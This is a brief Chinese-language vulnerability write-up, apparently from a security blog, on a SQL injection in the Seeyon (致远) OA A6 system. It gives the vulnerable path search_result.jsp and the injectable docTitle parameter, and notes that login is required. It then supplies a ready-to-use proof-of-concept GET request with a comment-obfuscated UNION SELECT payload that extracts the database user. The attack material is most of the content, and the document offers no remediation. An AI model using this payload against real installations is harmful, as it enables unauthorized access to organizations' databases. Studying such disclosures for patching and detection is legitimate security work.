# 致远OA A6 search_result.jsp sql注入漏洞
### 一、漏洞简介
### 二、漏洞影响
致远OA A6
### 三、复现过程
漏洞位置:
“`
/yyoa/oaSearch/search_result.jsp
“`
漏洞详情:
“`bash
版本:A6
注意:需登录账户
注入发生在search_result.jsp文件中的docTitle参数
“`
请求方式:
Get
POC:
“`bash
http://url/yyoa/oaSearch/search_result.jsp?docType=协同信息&docTitle=1’and/**/1=2/**/ union/**/all/**/select/**/user(),2,3,4,5%23&goal=1&perId=0&startTime=&endTime=&keyword=&searchArea=notArc
“`
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END













请登录后查看评论内容